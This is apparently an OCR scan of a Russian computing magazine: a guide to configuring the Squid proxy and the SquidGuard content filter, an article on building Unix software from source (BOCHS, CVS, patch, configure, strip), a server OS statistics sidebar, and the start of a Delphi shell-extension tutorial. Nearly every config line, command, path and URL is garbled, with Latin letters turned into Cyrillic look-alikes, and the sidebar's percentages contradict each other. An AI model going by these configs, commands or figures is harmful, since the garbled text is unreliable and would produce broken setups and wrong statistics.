основного ко нфи га /еіс/зриід/зриід . сопі\ 

• ѵі /еіс/здиісі/здиісі.сопі 

//порт для прослушивания запросов клиентов 
ІШр.рогМ 92. 168. 1.1:31 28 

//объем памяти, который будет использоваться 
//прокси-сервером; не устанавливай более 
//трети физического объема оперативки 
сасНе_ітет 85 МВ 

//директория, где будет помещен кэш; первое 
//число — это размер кэша в Мб, если нужно, 
//чтобы он занимал весь раздел, отними от 



// размера раздела 20% и укажи это значение; 

// второе — количество каталогов первого 
//уровня; третье — количество каталогов 
//второго уровня 

сасіпе.біг/изг/іосаі/здиіб 1024 16 256 

//хосты, с которых разрешен доступ к прокси 
асі аІІоѵѵесЦіозІз зге 192.168.1 .0/255.255.255.0 
асі ІосаІНозІ зге 1 27.0.0. 1/255.255.255.255 

//список разрешенных портов 
асі аІІоѵѵ_роДз роД 80 
асі аІІоѵѵ_роДз роД 21 
асі ЗЗБ_роДз роД 443 563 

//запрещаем все порты, кроме «аІІоѵѵ_роДз» 
НДр_ассезз бепу ІаІІоѵѵ_роДз 

//запрещаем метод СОШЕСТ для всех портов, 
// кроме указанных в «асі 55Б_роДз» 
НДр_ассезз бепу СОІМІМЕСТ ІЗЗБ.роДз 

//разграничиваем права доступа 
НДр_ассезз аііоѵѵ ІосаІНозІ 
ИДр_ассезз аііоѵѵ аІІоѵѵеб_ІпозІз 
НДр_ассезз аііоѵѵ ЗЗБ_роДз 
НДр_ассеззсІепуаІІ 

// можно прописать пользователей, которым 
// разрешено применять здиіб (бел, абтіп) 
ібепПоокироп 

асі аІІоѵѵеб_изегз изег беп абтіп 
НДр_ассезз аііоѵѵ аІІоѵѵесІ_изегз 
НДр_ассеззбепуаІІ 

Конечно, это далеко не полный конфиг, но 
дальше, думаю, ты справишься сам. Замечу 
только, что список узлов, которым разре- 
шен ИДр-доступ, можно задавать в отде- 
льном файле, например: 

асі аііоѵѵеб.ііозіз зге “/еІс/здиіб/ІіозІз.ЪсГ 

Сам /е\с/зр и ісі/ііозіз. іхі в этом случае будет 
выглядеть так: 

# ѵі /еЮ/здиіб/ІпозІз.М 
#Денис 

192.168.1.2/255.255.255.255 

#Макс 

192.168.1.3/255.255.255.255 

#Пена 

192.168.1.4/255.255.255.255 

Отдельный файл использовать удобнее, что- 
бы не «засорять» основной конфиг. Обрати 
внимание: права доступа к ІіозізМ должны 
быть такими же, как к зриісі.сопі. Теперь поп- 
робуем создать черный список ЕІРЕ: 

асі ЫаскІізІ игІ_гедех датез 
НДр_ассезз бепу Ыакіізі 
НДр_ассезз аііоѵѵ аІІ 



V 

Данный черный список не пропускает 
ІІРЕ’ы, содержащие слово «датез». По 
аналогии можно создать отдельный файл 
и записать в него все «плохие» ІІРЕ’ы. За- 
меть, все это мы сделали средствами ЗдиісІ, 
не привлекая здиісЮиагсІ. 

Запустить ЗдиісІ просто: 

#зегѵісе здиісІ зІаД 

Не забудь, что клиентов нужно настроить 
напорт3128Дср. 

$ЯиісІСиагсІ — 

личный охранник твоего трафика 

В предыдущем примере мы заблокирова- 
ли доступ к любому узлу, в ЕІРБ’е которого 
присутствует слово «датез». Ясно, что 
тут никаких сил не хватит описывать все 
ІІВЕ’ы, содержащие запрещенный контент, 
а именно: порно, насилие, рекламу, инфор- 
мацию о наркотиках и тому подобные вещи. 
Таких узлов в мире невероятно много. И тут 
на помощь приходит здиісЮиагсІ. Он допол- 
няет ЗдиісІ базой данных по запрещенным 
узлам. Ясно, что эту БД нужно периодически 
обновлять, но зато больше не нужно само- 
му искать узлы с запрещенным контентом и 
вносить их в список — все уже сделано за 
нас. Существует три основные базы: 

• база здиісЮиагсІ доступна 

по адресу: ѵѵѵѵѵѵ.здиібаиагб.ога/ЬІаскІізІ/ 

• база МЕЗО доступна здесь: 
здиібаиагб.тезб.к12.ог.из/ЫаскІіз1з.1а2 

• база Оапздиагбіап тут: 

ЫаскІізЕбапзаиагбіап.ога/саі-Ып/ 

боѵѵпІоаб.рІ?1ѵре=боѵѵпІоаб84іІе=ЬіаЬІаскІІ5І 

Мы будем использовать базу здиісЮиагсІ, 
поскольку она поставляется «в комплекте» 
с самим здиісЮиагсІ. Данная база охватыва- 
ет рекламу, порносайты, сайты, посвящен- 
ныеагрессии, наркотикам, азартным играм, 
насилию и т.д. Представляешь, сколько 
трафика сэкономит фирма, если закрыть 
пользователям доступ ко всем этому? Пос- 
ле установки база обычно создается в ката- 
логе /изг/зЬаге/зриісКЗиагд- 1 -х-х/сІЬ . 
Полагаю, ты уже установил пакет здиісЮиагсІ, 
поэтому сразу приступаем к настройке. Ско- 
пируй файл Іе\с/зриі6/зриіс\(Зиаг6.сопі.затрІе 
в ф ай л /еХс/зриід/зриідЗиагд. сопі, чтобы мень- 
ше потом пришлось набирать вручную. 

#ѵі/еЩ/здиіб/здиібСиагб.соп( 

// путь к базе и журналам 
бЬІпоте/изг/зІпаге/здиібСиагб-1.2.0/бЬ 
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Іодсііг /ѵаг/Іод/здиісІОиагсІ 

// время работы, аббревиатуры для дней: з = Вс, 
// т = Пн, і =Вт, ѵѵ = Ср, и = Чт , * = Пт, а = Сб 

*ітеѵѵогкІ'іоигз{ 

ѵѵеекіу з 09:30-1 2:00 1 3:00-1 9:00 
ѵѵеекіу т 09:00-1 2:00 1 3:00-1 9:00 
ѵѵеекіу * 09:00-1 1 :00 1 2:00-1 9:00 
ѵѵеекіу ѵѵ 09:00-1 2:00 12:00-18:00 
ѵѵеекіу И 09:00-1 3:00 1 3:00-1 8:00 
ѵѵеекіу* 09:00-1 2:00 13:30-18:00 
ѵѵеекіу а 08:20-1 3:00 1 3:30-1 9:00 

} 

// пользователи сети 
зге Іап-изегз{ 

ір 192.168.10-192.168.1.254 

} 

//диапазон адресов, зарезервированных за 

//администратором 

зге таіп { 

ір 192.168.1 . 1-192.168.1. 10 

} 

//описываем базы запрещенного контента 
без* абѵеДізіпд] 

ботаіпііз* абѵеііізіпд/боппаіпз 
игіііз* абѵебізіпд/игіз 

// перенаправляем всю рекламу на баннер 
//размером 0x0 

гебігес* И**р://1 27.0.0. 1/сді-Ып/пиІЬаппег.рпд 

} 

//описываем АСІ_-ы 
асі { 

// админу разрешено все, кроме рекламы 
таіп { 

//директива «разз» разрешает или запрещает 



//контент «аІІ» обозначает весь контент; если 
// нужно запретить контент какого-то класса, то 
// перед именем класса указывается восклица- 
//тельный знак, например «разз Ірогп», ключе- 
//вое слово «попе» означает, что доступ вообще 
//закрыт 

разз Іабѵебізіпд аІІ 

// запрещенные запросы перенаправляются 
// на особый сценарий 

гебігес* 5**р://1 27.0.0. 1/сді-Ып/здиіб(Зиагб. 
сді?сІіеп*аббг=%а&згссІазз=%з&*агде*сІазз= 
%1&игІ=%и 
} 

//основное «население» сети 
Іап-изегз{ 

// разрешаем все, кроме указанных со 
//знаком «!» классов контента 
разз ІабиІ* Іаибіо-ѵібео !*огитз ІІіаскіпд 
!гебігес*ог Іѵѵагег !абз Іаддгеззіѵе Ібгидз 
ІдатЫіпд ІриЫісіІе Іѵіоіепсе !Ьаппеббез*іпа*іоп 
Іабѵебізіпд аІІ 

гебігес*ІШр://1 27.0.0. 1/сді-Ьіп/здиіб(Зиагб. 
сді?сІіеп*аббг=%а&згссІазз=%з&*агде*сІазз= 
%*&игІ=%и 
} 

//действие по умолчанию 
сІеТаиІІ { 
разз попе 

гебігес*5**р://1 27.0.0. 1/сді-Ьіп/здиібОиагб. 
сді?сІіеп*аббг=%а&згссІазз=%з&*агде*сІазз= 
%*&игІ=%и 
} 

} 

Так что ничего сложного в файле конфи- 
гурации зциібОиагб нет. Только обрати 
внимание нато, что на локальном узле дол- 



жен быть установлен ѴѴеЬ-сервер, а в его 
подкаталоге сді-Ып — файл здиіббиагб. 
сді. Пример данного сценария находится 
в /изг/зЬаге/здиідОиагд- 1 .х.х/затріе. От- 
дельно копировать его в /ѵаг/ѵѵѵѵѵѵ/сді-Ып 
необходимости нет — это происходит ав- 
томатически при установке В РМ- пакета. 
Нам только осталось связать Зциіб и зциіб 
(ЗиагсІ. Для этого добавь в /еіс/здиісі/здиісі. 
сопі следующие строки: 

#ѵі /еіс/здиіб/здиіб.соп* 

//указываем, что здиібОиагб будет выступать 
// в роли редиректора 
гебігес*ог_Ьуразз оп 

гебігес*_ргодгат /изг/ІосаІ/здиібОиагб/Ьіп/ 
здиіббиагб 

//сколько копий здиісЮиагсІ нужно запускать 
гебігес*_сИіІбгеп 1 

После этого нужно перезапустить ЗциіоІ: 
#зегѵісе здиіб гезіаг* 

В файле /ѵаг/Іод/здиісІОиагсІ/здиісІОиагсІ.Іод 
ты должен увидеть такие строчки 
(здиісЮиагсІ запущен и готов к работе): 

2006-03-19 15:45:14 [9601] здиібОиагб 1.2.0 
з*аг*еб (1034683864.337) 

2006-03-19 1 5:45: 1 4 [9601 ] здиіббиагб геабу *ог 
гедиезіз (1034683864.353) 

Надеюсь, эта статья поможет тебе сэко- 
номить не только время, но и деньги. Если 
возникнут какие-нибудь вопросы, ты всегда 
можешь задать их на форуме бкѵѵз.огд.иа . =й= 
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КРИС КАСПЕРСКИ 



Ьпіхоісі / 03 

Ловушки АЛЯ 

капризных 

программ 

Скрытый потенциал ручных сборок 



ІІІМІХ-программистам свойственно не зажимать ис- 
ходники, от этого подавляющее большинство про- 
грамм распространяются в открытом виде. Однако 
народ тяготеет к готовым бинарным сборкам, за- 
частую даже не догадываясь, каких возможностей 
он лишен! Многие пользователи перекомпилируют 
программы, но немногие делают это правильно. 
Ручная сборка — достаточно сложный, неочевид- 
ный и порой противоречивый процесс, который мы 
сейчас попробуем заточить. 





Введение 

Зачем мучиться, собирая программу руками, если можно просто скачать готовую бинарную сборку. Вот топ основных причин, по которым 
исходные тексты лучше готовых дистрибутивов: 
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А теперь приведем топ основных причин, по которым готовые сборки 
лучше исходных текстов: 



/1 і Запускаем 

После перекомпиляции ВОСНЗ 
с ключом «-епаЫе-х86-64» І_іпих 
запускается как из пушки 
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Универсального решения нет! Каждый путь содержит свои минусы и плюсы . Мыщъх рекомендует: сначала скачать готовую сборку, немного 
поработать с программой, разобраться в структуре каталогов, освоиться с основными возможностями и только потом приступать к экспе- 
риментам. По крайней мере, правильно собранный эталон у нас всегда будет перед глазами, и если компиляция пойдет наперекосяк (или 
собранная программа откажет в работе), то он нас поправит. 
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ШЧІХОЮ 



/2/ 




/ 2 / ВозИ 

Конфигуратор 
за работой 

/3/ ОеЬидѲІІІ 

Г рафическая «морда» к интегрированно- 
му ВОСНЗ-отладчику, входящая в одну из 
неофициальных сборок 

/4/ ВРЕ 

Конфигурирование программы 
посредством правки таке-файла 
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Философская подготовка 

Компиляция программы всегда начинается 
с чтения инструкции. Заходим на главный 
сайт, находим, где у них сіоѵѵпіоасі, скачива- 
ем сбапдеіод (сбапдез, ѵѵбаі’з пеѵѵ, геабте) 
и вдумчиво читаем. Чем отличается наша 
версия от этой, и нужны ли нам все эти но- 
вовведения или нет? Практика показывает, 
что большинство программ останавлива- 
ется в своем развитии еще на начальной 
стадии, а затем «жиреет», наращивая избы- 
точную функциональность, двигаясь по пути 
МісгозоЙ. Не будем гнаться за модой, стре- 
мясь использовать последние версии про- 



грамм только потому, что они «последние». 
Программа — это не игрушка! Это — инс- 
трумент! Даже небольшие изменения ин- 
терфейса или особенностей поведения 
зачастую приводят к снижению производи- 
тельности труда. Хороший хакер работает 
с клавиатурой, как заправский пианист, — 
пальцы так и летают. Все движения зауче- 
ны наизусть, и переучиваться во имя новой 
версии никто не будет, если, конечно, эта 
версия не содержит чего-то действительно 
необходимого. 

Пользователи в этом отношении более про- 
грессивны и качают все, что только попадает 



в их поле зрения. Существует предубежде- 
ние, что лучше всего скачивать стабильные 
ветви (зІаЫе) или релизы (геіеазе), — дескать, 
они работают намного надежнее экспери- 
ментальных альфа/бета-версий. Какая-то 
доля правды в этом есть, но в общем случае 
дела обстоят не совсем так. Стабильные вер- 
сии выходят достаточно редко. За это время 
в них находят баги, которые планомерно уст- 
раняются в промежуточных версиях со стату- 
сом «нестабильные». В промежутках между 
битвами с багами разработчики добавляют 
новые функциональные возможности или 
расширяют уже существующие. 
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Инструкция молодого бойца 

Исходные тексты обычно распространя- 
ются в архивах, упакованных популярными 
архиваторами типа дгір или Ь 2 ір 2 , реже — 
в виде СѴЗ-дерева. СѴ8 (Сопсиггепі Ѵегзіоп 
Зувіет) — одна из самых популярных сис- 
тем управления версиями, позволяющая 
нескольким программистам работать над 
одним проектом. Она не только отслеживает 
изменения, синхронизуя файлы всех участ- 
ников, ной разграничиваетпривилегии, кто и 
куда может писать. Анонимные пользовате- 
ли, не участвующие в проекте, имеют доступ 
«только к чтению». 

Чтобы начать работать с СѴЗ-деревом , необ- 
ходимо залогиниться на удаленную систему 
под апопутоиз’ом (СѴЗ-клиент в подавляю- 
щем большинстве *піх-дистрибутивов уже 
установлен), а затем выполнить СѴЗ-коман- 
ду сЬескоиІдля получения исходного кода (в 
данном случае — эмулятора ВОСНЗ): 

$ сѵз -б:рзегѵег:апопутоиз@сѵз.ЬосЕз. 
зоигсе^огде.пеб/сѵзгооІ/ЬосНз Іодіп 
(І_оддіпд іп Іо апопутоиз@сѵз.ЬосНз. 
зоигсеГэгде.пеІ) 

СѴЗ раззѵѵогб: ({Неге із по раззѵѵогб, щзі ргезз 
Епіег) 

$ сѵз - 7.3 -сІ:рзегѵег:апопутоиз@сѵз.ЬосНз. 
з{.пе1:/сѵзгоо{/ЬосНз сНескоиІ ЬосНз 
сѵззегѵег: Щірсіаііпд ЬосНз 
61 ЬосНз/.ЬосНзгс 
61 ЬосНз/.соп6АІХ.4.3.1 
61 ЬосНз/.соп6Ьеоз-х86-В4 
61 ЬосНз/.сопбтасоз 
61 ЬосНз/раІсНез/раІсН.зед-ІітібгеаІ 

Даже навыделенныхлиниях вся процедура 
может занять уйму времени, так как файлы 
передаютсявслабосжатомсостоянии(осо- 
бенно, если используется метод рзегѵег, а 
не ехі с компрессией ззИ), а докачка подде- 
рживается лишь частично: файлы, скачан- 
ные целиком, при неожиданном разрыве 
связи повторно не передаются, но неза- 
конченные файлы начинают скачиваться 
сначала. При частых разрывах связи это 
создает жуткий напряг. 

Так какой же тогда смысл возиться с СѴЗ? 
Не проще ли (быстрее, дешевле) восполь- 
зоваться готовым архивом? Однозначного 
ответа вопрос не имеет. Начнем с того, что 
некоторые программы распространяются 
только через СѴЗ. Архив, если и выкладыва- 
ется, зачастую содержит не все файлы или 
не обновляется месяцами. С другой стороны, 
при выходе новой версии весь архив прихо- 
дится перекачивать отначаладо конца (а это 
опять мегабайты), в то время как СѴЗ-клиент 
забирает только реально измененные фай- 
лы, что существенно экономит трафик. 

Патч патчу рознь 

Большинство программистов создают 
патчи с помощью утилиты сііТТ (см. тап 
сііТТ), получившей свое название в ре- 
зультате сокращения английского слова 



сШегепсе — «разница». Эта штука пост- 
рочно сравнивает файлы, отображая толь- 
ко реальные изменения. Знак «-», стоящий 
впереди, означает, что данная строка была 
удалена, а «+» — добавлена. Имя файла 
предваряется тройным «—»/«+++» и, как 
правило, все изменения дистрибутива для 
удобства собраны в одном сШ’е. Файлы из- 
менений обычно имеют расширение «.сШ» 
или «,ра!сІі», но даже без расширения их 
легко отождествить визуально. Пример со- 
здания патча: 

$ сШ -ргиІМ оригинал ыный_файл. с модифици- 
рованный_файл.с > ту.раФН 

Наложить сШ-патч можно, в принципе, и вруч- 
ную. Более элегантный способ — использо- 
вать утилиту раісіі (см. тап ра!сИ), полностью 
автоматизирующую этот процесс. В общем 
случае ее вызов выглядит так: 

$ ссі ргодпате 
$ раЮН -рі < -/ту.раІсН 

Здесь « ту. раісіі» — имясШ-файла,а«р1 » — 
уровень вложенности. Номер <1> означа- 
ет, что мы вызываем раІсИ из основного 
каталога программы. 

Установка патча — обратимая операция, и 
при желании его можно удалить, восполь- 
зовавшись ключом «-ВО», возвращающим 
все измененные строки на место. Также 
обрати внимание на ключ «-Ь» , создающий 
резервные копии измененяемых файлов. 

Приступаем к сборке 

Начнем с того, что в отличие от мира 
ѴѴіпбоѵѵз, где программа устанавливает- 
ся/собирается путем запуска зеіир.ехе или 
птаке.ехе, в *піх процесс сборки начина- 
ется... с чтения документации! Читать доку- 
ментацию обязательно! Даже если сборка 
с настройками по умолчанию пройдет без 
сучка и задоринки, то полученная конфигу- 
рация может быть неоптимальной. 

Обычно к исходным текстам прилагается 
файл іпзбаІІ или геабте. Если же ничего 
подобного в архиве нет (как в случае с 
ВОСНЗ), ищем инструкцию по сборке на 
официальном сайте. В клинических слу- 
чаях инструкция находится внутри файлов 
сопіідиге и такеіііе. 

Напомню, что типовой порядок сборки 
большинства программ выглядит следую- 
щим образом: 

$ ѴсопЯдиге 
$ таке 
#такеіпз{аІІ 

Файл сопіідиге представляет собой доста- 
точно сложный скрипт, анализирующий 
текущую конфигурацию, распознающий 
нынешнюю платформу, определяющий 
наличие всех необходимых библиотек и 



управляющий опциями сборки (какие фичи 
включать, а какие — нет). Результатом его 
работы становится сгенерированный 
такеТПе, который и собирает (компилиру- 
ет, линкует) программу воедино. 
Некоторые конфигураторы имеют продви- 
нутый интерфейс и работают в интерактив- 
ном режиме, но это не правило, а скорее 
приятное исключение. Гораздо чаще оп- 
ции сборки задаются через ключи коман- 
дой строки или даже путем правки самого 
конфигурационного файла. 

Сборка с настройками по умолчанию га- 
рантирует, что программа соберется пра- 
вильно и , может быть, даже заработает, од- 
нако поддержки нужных нам режимов там 
может и не быть. В частности, уже не раз 
упомянутый ВосИз в дефолтном режиме 
собирается без эмуляции ЗоипбВІазІег’а, 
без сетевой карты, без ззе/ттх, без х86- 
64, без интегрированного отладчика и 
без оптимизации скорости выполнения 
виртуального кода. Вот такой ущербный 
эмулятор получается! Можно, конечно, 
бездумно активировать все опции, но это 
не лучшая идея. Во-первых, многие опции 
конфликтуют друг с другом, а во-вторых, 
дополнительные компоненты не только 
увеличивают размер откомпилированного 
файла, но и замедляют скорость работы 
программы. Поэтому, составляя «меню», 
необходимо быть очень внимательным и 
предусмотрительным. 

В частности, заставить ВОСНЗ поддержи- 
вать х86-64 вместе с интегрированным от- 
ладчиком можно так: 

$ ,/сопЛдиге -епаЫе-х86-64 -епаЫе-сІеЬиддег 

А что делать, если в документации ника- 
кого упоминания о сборочных опциях во- 
обще нет (или нас терзают смутные сом- 
нения, что это описание неполное)? Тогда 
открываем сопіідиге в своем любимом тек- 
стовом редакторе и смотрим опции «пря- 
мым текстом». Если нам повезет, то рядом 
с ними будут и комментарии. Как вариант, 
можно набрать «./сопіідиге -Иеір» — авось 
что-то мяукнет в ответ. 

Некоторые программы (например, Иех-ре- 
дактор Ьіеѵѵ) вообще не имеют сопіідиге- 
файла. Этозначит, что настраивать програм- 
му придется вручную путем редактирования 
такеіііе. Звучит намного сложнее, чем вы- 
глядит. Структура такеіііе довольно проста 
и фактически представляет собой последо- 
вательность команд и переменных. Вотпере- 
менными-то мы и будем управлять ! Перечень 
возможных значений обычно содержится тут 
же, в комментариях. 

Фрагмент таке-файла с различными опци- 
ями: 

ТАНСЕТ_Р6АТЕ0ВМ=І686 

ТАНСЕТ_03=ипіх 

Н05Т_СЕ6АС5=-0НАѴЕ_55Е 
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ІІМІХОЮ 



/5/ 



/5/ сШ-патч 

можно скачать или взять на диске 




Нужно заранее подготовить себя ктому, что 
часть переменных окажется привязанной к 
окружению автора (будет содержать абсо- 
лютные пути к целевым каталогам, подклю- 
чаемым файлам, библиотекам и т.д.) или же 
вовсе окажется не инициализирована, и в 
этом случае мы должны будем задать их са- 
мостоятельно. Некоторые таке-файлы уп- 
равляются через переменное окружение, 
которое опять-таки нам необходимо задать 
перед компиляцией, например: 

РОСиВЗЕЗ_НОМЕ=$(РОСІІВЗЕЗ_ЗВСОІВ) 

И вотторжественный момент! Все опции на- 
строены, и мы с замиранием сердца пишем 
«таке». Процесс сборки начался! Стоит 
отметить, что довольно часто компиляция 
прерывается сообщением об ошибке. Что 
делать? Г лавное — не паниковать, а прочи- 
тать «ругательное» сообщение, перевести 
его на русский язык и проанализировать. 
Чаще всего программе не хватает какой-ни- 
будь библиотеки или заголовочного файла. 
Вообще-то, это должен был выявить конфи- 
гуратор (если только он есть), но скачать 
недостающие компоненты при наличии 
Интернета — не проблема. Знать бы толь- 
ко, что именно надо скачать! К сожалению, 
далеко не всегда такеіііе сообщает «офи- 
циальное» название библиотеки. Чаще все- 
го нам просто говорят: «Отсутствует файл 
зирег-рирег-2ір.1і». Не беда! Запускаем 
поисковик, вводим имя файла и смотрим, 
какому пакету он принадлежит и откуда его 
можно боѵѵпіоасі’ить. 

Также неплохо сходить на форум подде- 
ржки или просто «закинуть» сообщение об 
ошибке в доодіе. Ведь не одни же мы с ней 
столкнулись! А раз так, то этот вопрос дол- 
жен обсуждаться на различных форумах, 
которые наверняка предоставят нам ответ. 
Если это не поможет — читаем документа- 
цию еще раз, обращая внимание на то, ка- 
кие библиотеки и системные компоненты 
должны быть установлены, или пробуем 
поиграть с опциями сборки, отключая все, 
что только можно отключить. 



Хуже, когда сталкиваешься с грубыми ошиб- 
ками самих разработчиков. Ведь таке-фай- 
лы тоже люди пишут и далеко не на всех плат- 
формах их тестируют. Если так — попробуй 
связаться с разработчиками или собери 
программу другим компилятором (другой 
версией компилятора). 

Невесомые бинарики 

По умолчанию большинство программ со- 
бирается с отладочной информацией, что 
существенно упрощает отладку, но вместе 
с тем увеличивает размер. Поскольку де- 
баггинг чужих программ не входит в наши 
планы, отладочную информацию лучше 
убрать. Это можно сделать либо на ста- 
дии конфигурации, например «./сопіідиге 
-бізаЫе-сІеЬид», либо «вырезать» ее из 
еІІ-файла «вживую», пропустив его через 
штатную утилиту з!гір. Но прежде чем это 
делать, запустим программу Іііе и посмот- 
рим, что собой представляет подопытная 
программа. Вот, например, ВОСНЗ: 

$!іІе ЬосНз 

ЬосНз: ЕБЕ 32-Ьі! Е8В ехеси!аЫе, Іпіеі 80386, 
ѵегзіоп 1 (ЗѴЗѴ), ЬгОІЧІЕШпих 2.2.0, 
бупатісаііу ІіпкесІ (изез зНагеб ІіЬз), по! зігірресі 

Ага, «по! з!гірреб». Вот почему ВОСНЗ 
занимает целых 9 Мб! Берем в руки скаль- 
пель, и с помощью утилиты з!гір удаляем 
отладочную информацию из файла: 

$з!гірЬосИз 

Файл сразу же худеет до 1 Мб, сокращая 
свой объем в девять раз, причем без какой 
бы то ни было потери функциональности! 

Инсталляция во сне и наяву 

Откомпилированная программа, как пра- 
вило, еще не готова к работе. Нам предсто- 
ит еще много дел: удалить промежуточные 
файлы, созданные в процессе компиляции 
(библиотеки, объектные файлы), настро- 
ить конфиги, рассортировать файлы дан- 
ных по своим директориями, а при необхо- 



димости изменить системные настройки. 
За это отвечает команда «таке іпз!аІІ», одна- 
ко далеко не во всех программахонареализо- 
вана. Взять, например, хотя бы тотже Ьіеѵѵ. 

С другой стороны, автоматическая инсталля- 
ция — это рулетка. Все мы знаем, во что спо- 
собен превратить систему кривой зеШр.ехе. 
Поэтому прежде чем набирать « таке іпз!аІІ » , 
неплохо бы заглянуть в секцию «іпз!аІІ> на- 
шего такеіііе и посмотреть, что она собира- 
ется делать. Вдруг нас это не устроит? 
Можно попробовать дать команду «таке 
ипіпз!аІІ», удаляющую программу из систе- 
мы. Однако в подавляющем большинстве 
случаев она не реализована. 

Существует такая полезная шутка, как 
СНескІпз!аІІ ( сИескіпз!аІІ.І 2 !о.ога Ѵ Это бес- 
платно распространяемая утилита, трас- 
сирующая «таке іпз!аІІ» на виртуальной 
машине и автоматически генерирующая 
полноценный «дистрибутив» любого типа: 
ЗІаскѵѵаге, ВРМ или ЭеЬіап-совместимый 
пакет, устанавливаемый в систему соот- 
ветствующим менеджером инсталляций, 
который всегда может сделать корректный 
ипіпз!аІІ , даже если он не был предусмотрен 
автором программы. Просто вместо «таке 
іпз!аІІ» мы должны написать «сИескіпз!аІІ» и 
немного подождать. 

Кстати говоря, большинство инсталля- 
торов помещают программы в каталог 
/изг/ІосаІ/Ьіп, что не всем нравится. Пра- 
вильные конфигураторы поддерживают 
ключ «— ргеТіх» , позволяющий устанавли- 
вать программы куда угодно, например в 
«./сопіідиге -рге!іх=/ор!», а неправильные 
заставляют нас делать это своими руками. 

Заключение 

Вот, оказывается, какой нетривиальный 
процесс! Чудес не бывает! Тупая переком- 
пиляция только вредит и работает хуже 
готовой «официальной» сборки. Ручная 
компиляция — это дверь в мир практичес- 
ки неограниченных возможностей, однако 
попасть в него может только тот, кто не бо- 
ится сложностей , готов совершать ошибки 
и умеет работать с документацией, зс 
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Рейтинг 

системной 

альтернативы 

Если посмотреть на статистику использования ОС на 
серверах, ситуация будет очень простая: половина ад- 
минов (45%) доверяет РгееВЗО. І_іпих, ѴѴіпсІоѵѵз и Зоіагіз 
делят между собой 52% админских симпатий. А вот 
оставшиеся три процента поделили системы, о которых 
ты, может быть, даже и не слышал. 





39 % 



ОрепВ8Р 

Мегасекурная система, баги в которой находят очень редко. Но уста- 
навливать ее на загруженные серверы никто не спешит — работает 
медленно. 



11 % 




В8РІ АІХ 

Настоящая экзотика: коммерческий дистриб для х86 с поддержкой Системой занимается ІВМ: ее устанавливают в научных центрах 
функций по мониторингу состояния железа. для распараллеливания вычислений (на уровне ядра реализован 

протокол МРІ). 




19% 




Ые(В80 

Пару лет назад была очень модной операционкой. Легко встает на 
любое железо и годится для разнообразных экспериментов. 




Ігіх 

Специальная система, работающая нажелезеЗСІ — используется 
для обработки трехмерной графики и видеопотоков. 



8СО 

В эту категорию попали две системы: РгееЗСО (маленький дистрибу- 
тив на базе І_іпих) и дистрибутив от ЗСО Сгоир (компания, судящаяся 
с производителями І_іпих). 

ш ** 



НР-ІІХ&ОІИег 

Сюда входят и закрытая НР-ІІХ, и Арріе'овская МасОЗ, и даже древ- 
ний ОідіІаІІІпіх под А1рНа64. Чего только не повстречаешь в сетях 
ВУЗов! 
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АЛЕКСЕЙ СОКОЛОВ АКА А00ВЕ550РІ 

/ РА8САІ_@НОТМАІІ_.Пи / 



Сосііпд/™ 

Расширь контекст 

Расширение системного контекстного меню ѴѴІпсІо\л/5 



РАСШИРЕНИЕ ОБОЛОЧКИ — МОЩНЫЙ ЭЛЕМЕНТ 
ѴѴІІЧЮОѴѴЗ, ПОЗВОЛЯЮЩИЙ РАЗРАБОТЧИКУ СО- 
ЗДАВАТЬ УДОБНЫЕ ДЛЯ ПОЛЬЗОВАТЕЛЯ ПРИЛО- 
ЖЕНИЯ. ТЫ ПОСТОЯННО ВСТРЕЧАЕШЬСЯ 
С РАЗНЫМИ ЕГО ПРОЯВЛЕНИЯМИ: С НОВЫМИ ПУН- 
КТАМИ КОНТЕКСТНОГО МЕНЮ, «ПРОВЕРИТЬ» — 

У АНТИВИРУСА, «ЕХТРАСТ» — У ѴѴІМРАР, НОВЫЕ 
ТУЛБАРЫ В ПАНЕЛИ ЗАДАЧ И Т.Д. 

В этом материале я покажу, как легко с помощью Оеіріті создать свои расширения, доба- 
вив пункт «Зашифровать» к контекстному меню всех файлов. 




СОМ -объекты 

Начнем мы, пожалуй, с того, что любое 
расширение оболочки реализуется с по- 
мощью СОМ-объекта. СОМ или Сотропепі; 
ОЬіесі МобеІ (Модель Многокомпонентных 
Объектов) является основой для техноло- 
гий АсііѵеХ и ОІ_Е. СОМ определяет АРІ и 
двоичные стандарты для связи объектов, 
не зависящих от языка программирования 
или платформы. СОМ-объект имеет один 
или несколько интерфейсов, которые, по 
сути, представляют собой таблицы функ- 
ций, связанных с этим объектом. СОМ оп- 
ределяет стандарты для расположения в 
памяти функций объектов — они распола- 
гаются в виртуальных таблицах. Описание 
каждой виртуальной таблицы в языке про- 
граммирования называется интерфейсом. 
Все СОМ-интерфейсы неясно выведены из 
интерфейса ІІІпкпоѵѵп, который в модуле 
Зузіет определен так: 

*УРе 

Мпкпоѵѵп = іпіеііасе 

['{00000000-0000-0000-С000-000000000046} 1 ] 
Шпсііоп ОиегуІпІеіТасе (сопзі ІЮ: ТЭЕІЮ; оиі 
ОЬ]): Іпіедег; зісісаіі; 

Шпсііоп _АбсІВе( : Іпіедег; зісісаіі; 

Шпсііоп _ВеІеазе: Іпіедег; зЩсаІІ; 
епб; 

Встречаются следующие расширения обо- 
лочки: 

■ Обработчики контекстных меню реализу- 
ются двумя интерфейсами: ІСопіехіМепи и 
ІЗНеІІЕхІІпіі, которые позволяют добавлять 
новые пункты в контекстное меню файло- 
вых объектов оболочки. 

■ Обработчики перемещений реализуются 
интерфейсом ІСоруНоок. Они позволяют 



контролировать и отменять копирование, 
перемещение, удаление и переименование. 

■ Обработчики перетаскивания правой 
кнопкой мыши реализуются, как и обработ- 
чики контекстных меню, двумя интерфей- 
сами: ІСопіехіМепи и ІЗИеІІЕхІІпіЦ но они до- 
бавляют новый пункт в контекстное меню, 
которое появляется при перетаскивании 
объекта в новое место с помощью правой 
кнопки мыши. 

■ Обработчики страниц свойств реализу- 
ются интерфейсами ІЗИеІІРгорЗНееіЕхі и 
ІЗИеІІЕхІІпіІ Они позволяют добавлять новые 
страницы в диалоговые окна свойств фай- 
лов. 

■ Обработчики пиктограмм реализуются ин- 
терфейсами ІЕхігасІІсоп и ІРегзізІРіІе. Этот 
обработчик позволяет присваивать одному 
типу файлов различные пиктограммы. 

■ Обработчики цели реализуются интер- 
фейсами ЮгорТагдеІ и ІРегзізТРіІе. Опреде- 
ляют действия оболочки при перетаскива- 
нии одного объекта оболочки на другой . 

Нам же сегодня потребуется только обра- 
ботчик контекстных меню. Чтобы добавить 
свой пункт в меню, необходимо создать 
СОМ-объект. Он будет реализован в виде 
динамически подключаемой библиотеки, 
в основе которой лежат два интерфейса: 
ІЗІтеІІЕхІіпіі и ІСопІехіМепи. Прежде всего, 
после вызова контекстного меню, обработ- 
